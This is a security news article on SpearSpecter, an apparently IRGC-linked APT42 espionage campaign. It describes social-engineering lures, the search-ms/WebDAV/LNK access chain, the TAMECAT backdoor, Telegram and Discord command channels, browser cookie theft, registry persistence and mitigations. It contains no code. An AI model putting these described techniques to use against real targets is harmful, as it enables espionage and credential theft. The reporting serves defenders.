Iranian threat actors aligned with the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO) are conducting a sophisticated espionage campaign tracked as SpearSpecter, systematically targeting high-value senior defense and government officials through personalized social engineering tactics.
The threat group, operating under multiple aliases including APT42, Mint Sandstorm, Educated Manticore, and CharmingCypress, has demonstrated remarkable patience and adaptability in its operations.
Unlike traditional mass phishing campaigns, SpearSpecter operators invest days or weeks developing authentic-seeming relationships with their targets. The threat actors conduct extensive reconnaissance via social media, public databases, and professional networks to gather deep intelligence on victims.
They craft believable scenarios involving exclusive conferences or strategic meetings, sustaining multi-day conversations to build credibility.
Notably, operators now extend engagement via direct WhatsApp communication, adding familiarity and legitimacy to their social engineering efforts.
The campaign broadens its scope by targeting family members of primary targets, thereby widening the attack surface and increasing pressure on high-value officials.
This approach enables the threat actors to impersonate individuals from the victim’s affiliations and create highly personalized lures that are difficult to detect.
Advanced Technical Capabilities
Within the SpearSpecter campaign, attackers noted their approach based on target value and operational objectives. For credential harvesting, they direct victims to crafted spoofed meeting pages that capture credentials in real time.
For long-term access, operators deploy TAMECAT, a sophisticated PowerShell-based backdoor with modular components designed to facilitate data exfiltration and remote control.
The initial access chain exploits Windows native features, including the abuse of the search-ms URI protocol handler to trigger pop-up prompts that ask users to “Open Windows Explorer”.
When victims confirm, Explorer connects to the attacker’s WebDAV server, displaying malicious LNK files disguised as PDFs. Clicking these shortcuts silently executes commands that fetch and run batch scripts from Cloudflare Workers.
Recent SpearSpecter activity marks the first recorded instance of APT42 using Telegram and Discord as command-and-control channels alongside traditional HTTPS infrastructure.
All data transfers are encrypted using AES-256 algorithm with hardcoded encryption keys and random initialization vectors transmitted through custom headers.
The TAMECAT backdoor listens for commands from the attacker’s Telegram bot and dynamically loads additional PowerShell payloads from different Cloudflare Workers domains depending on operational objectives.
The Discord C2 mechanism uses webhooks to send messages and retrieves commands using bot tokens and channel IDs, searching for messages from specific users.
This collaborative workspace approach allows actors to deliver unique commands to individual infected hosts while coordinating multiple attacks through a single infrastructure.
Extensive Data Collection
TAMECAT implements targeted reconnaissance and data harvesting, deliberately collecting high-value artifacts including documents, browser data, system information, and screenshots.
The malware’s FileCrawler module focuses on specific file types including documents, spreadsheets, presentations, media files, and archives while excluding noisy locations like cloud sync folders and system directories.
Browser data extraction demonstrates sophisticated evasion techniques, including exploiting Microsoft Edge’s native remote debugging capabilities on port 9222 to retrieve fully decrypted cookies without parsing locked databases. For Chrome, operators use the Sysinternals PsSuspend tool to temporarily suspend the browser process, releasing file locks to access profile databases.
The Screen module captures 50 screenshots at 15-second intervals, immediately uploading each image before deletion to reduce forensic traces.
Attackers also target Outlook mailbox cache files, copying OST files from profile directories and exfiltrating them in chunks over encrypted channels.
TAMECAT maintains persistence through multiple mechanisms, including a “Renovation” Run registry key that executes batch files at logon and the UserInitMprLogonScript registry value that runs lightweight beacon scripts communicating with Firebase Realtime Database.
The malware leverages living-off-the-land binaries including conhost.exe, cmd.exe, curl.exe, and msedge.exe to blend malicious actions with standard system activity.Runs.dll is a tiny .NET helper that reads a byte-range from a file and returns that slice (already Base64-encoded) to PowerShell.
Code obfuscation techniques include splitting payloads into dozens of Base64-encoded fragments that are reassembled at runtime, while configuration values are injected dynamically to keep static samples sterile.
Most functionality executes directly in memory, with recent samples storing victim identifiers in registry keys rather than disk files, reflecting evolution toward stealthier operations.
Mitigations
Researchers assess with high confidence that SpearSpecter is operated by Iranian state-aligned operators working on behalf of the IRGC-IO.
The infrastructure leverages Cloudflare Workers for resilient command-and-control, WebDAV-backed hosts on Somee for disposable delivery infrastructure, and cloud platforms including Scalingo and Tebi for staging operations.
Key delivery domains cloudcaravan[.]info and filenest[.]info were both created simultaneously on August 17, 2025, consistent with pre-planned paired staging.
Security experts recommend organizations enable PowerShell script block logging, deploy Sysmon reporting to SIEM solutions, and install EDR products to combat fileless attacks.
The search-ms URI protocol handler should be disabled through registry modifications to prevent exploitation.
Employee awareness programs must emphasize the sophistication of social engineering used by APT42, especially for senior personnel who may possess data of interest to the IRGC.
Network monitoring should establish baselines for legitimate services and alert on deviations, while proxy tools with packet inspection can detect attacker activity such as unusual HTTP headers.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.